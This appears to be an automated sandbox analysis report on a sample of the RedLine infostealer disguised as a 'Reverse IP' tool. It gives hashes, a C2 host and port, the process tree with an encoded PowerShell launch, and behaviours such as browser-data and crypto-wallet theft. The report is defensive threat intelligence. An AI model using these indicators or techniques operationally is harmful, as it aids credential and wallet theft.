Analysis
- max time kernel: 123s
- max time network: 127s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-08-2022 18:38
General
- Target: Reverse IP By Mf4Tn.exe
- Size: 9.3MB
- MD5: 086fb3b0ff1e3c6c351bd9e82465d395
- SHA1: c02cdb69a41e442b7200bb7b1d191e8cd005a015
- SHA256: f0fb578438edc3150919407abfc8ad167079ec3ac86bc84c3f93b2aa22fc73e8
- SHA512: b284e55632d2bfea8ae87a36a1f3805b17fa26e944230b9f16b08f50ec93eb29d19d692f1a71c50e63897f4d95f473ab89e0cc3390289d39bc6bf8381ba85116
Malware Config
Extracted
- Family: redline
- Botnet: 1877
- C2: overthinker1877.duckdns.org:60732
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine payload (3 IoCs)
  Processes (resource, yara_rule):
  - C:\Users\Admin\AppData\Local\Temp\svchosts.exe: family_redline
  - C:\Users\Admin\AppData\Local\Temp\svchosts.exe: family_redline
  - behavioral1/memory/1748-163-0x00000000008B0000-0x00000000008E8000-memory.dmp: family_redline
- Blocklisted process makes network request (2 IoCs)
  Processes (flow, pid, process):
  - flow 15, pid 3352, powershell.exe
  - flow 35, pid 3352, powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  Processes (pid, process):
  - 4860 svschosts.exe
  - 1748 svchosts.exe
  - 4172 svchost.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (Reverse IP By Mf4Tn.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (svschosts.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
  - flow 76, ipinfo.io
  - flow 77, ipinfo.io
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (2 IoCs)
  Processes (pid, pid_target, process, target process):
  - 1200, 976, WerFault.exe, Reverse IP By Mf4Tn.exe
  - 488, 4256, WerFault.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description, ioc, process):
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 (taskmgr.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
  - Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid, process):
  - 3352 powershell.exe (2 entries)
  - 4540 taskmgr.exe (8 entries)
  - 1748 svchosts.exe (2 entries)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 3352 powershell.exe
  - Token: SeDebugPrivilege, 4540 taskmgr.exe
  - Token: SeSystemProfilePrivilege, 4540 taskmgr.exe
  - Token: SeCreateGlobalPrivilege, 4540 taskmgr.exe
  - Token: SeDebugPrivilege, 1748 svchosts.exe
  - Token: 33, 4540 taskmgr.exe
  - Token: SeIncBasePriorityPrivilege, 4540 taskmgr.exe
- Suspicious use of FindShellTrayWindow (34 IoCs)
  Processes (pid, process):
  - 4540 taskmgr.exe (34 entries)
- Suspicious use of SendNotifyMessage (34 IoCs)
  Processes (pid, process):
  - 4540 taskmgr.exe (34 entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes (description, pid, process, target process):
  - PID 976 wrote to memory of 4860: Reverse IP By Mf4Tn.exe -> svschosts.exe (3 entries)
  - PID 4860 wrote to memory of 3352: svschosts.exe -> powershell.exe (3 entries)
  - PID 3352 wrote to memory of 1748: powershell.exe -> svchosts.exe (3 entries)
  - PID 3352 wrote to memory of 4172: powershell.exe -> svchost.exe (3 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\Reverse IP By Mf4Tn.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Reverse IP By Mf4Tn.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\svschosts.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\svschosts.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\svchosts.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\svchosts.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\AppData\Roaming\svchost.exe (depth 4)
        Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
        - Executes dropped EXE
  - C:\Windows\SysWOW64\WerFault.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 1568
    - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 976 -ip 976
- C:\Windows\system32\WerFault.exe (depth 1)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 536 -p 4256 -ip 4256
- C:\Windows\system32\WerFault.exe (depth 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 4256 -s 836
  - Program crash
- C:\Windows\system32\taskmgr.exe (depth 1)
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\svchosts.exe
  Filesize: 205KB
  MD5: b3503746bb7f1d30755c9f4a26ce0a2c
  SHA1: 2490c2a6b3fad0711993c8bb16aab2d21cefac6f
  SHA256: 90706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300
  SHA512: 142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c
- C:\Users\Admin\AppData\Local\Temp\svschosts.exe
  Filesize: 6KB
  MD5: 732e2530c727f4d8524e2163e02e3365
  SHA1: 8ecb098af3335761097a71911e12eb3ca4e5e350
  SHA256: 28cf9214549a31d152776af79a8bcc1d1e7c2e1f0288c8d7615d754fc0d21ceb
  SHA512: 6a2321bd128c404cc7b15613fe974c8368fef4aedd6e6bcf07ca2f2fb2f15d82d442b22769f5202471e29a978da1232a72759e8ba050ff007e950cca9ca6933f
- C:\Users\Admin\AppData\Roaming\svchost.exe
  Filesize: 14KB
  MD5: 1937d5a853734874a0ef18d4acc43113
  SHA1: 37c4f8d0c6fea50f836c0a308b06de910205189a
  SHA256: 88e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64
  SHA512: e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28